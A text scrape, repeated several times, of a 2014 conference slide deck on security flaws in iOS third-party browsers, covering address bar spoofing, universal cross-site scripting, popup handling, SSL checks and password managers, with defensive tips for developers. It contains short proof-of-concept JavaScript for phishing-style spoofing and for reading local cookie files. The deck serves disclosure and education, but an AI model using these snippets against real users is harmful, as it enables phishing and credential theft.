mobile browsers security: ios · uiwebview & wkwebview. javascript used to implement browser...
TRANSCRIPT
![Page 1: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/1.jpg)
Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
SyScan360 2014
Mobile Browsers Security iOS
This presentation expresses our private opinions
The sample attacks against Google and PayPal users demonstrated in this presentation
are based on vulnerabilities in the browsers not in these websites
Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
Thank you Marek Zmysłowski Aleksander Droś
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 2: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/2.jpg)
This presentation expresses our private opinions
The sample attacks against Google and PayPal users demonstrated in this presentation
are based on vulnerabilities in the browsers not in these websites
Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
Thank you Marek Zmysłowski Aleksander Droś
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 3: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/3.jpg)
Łukasz Pilorz Paweł Wyleciał
Thank you Marek Zmysłowski Aleksander Droś
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
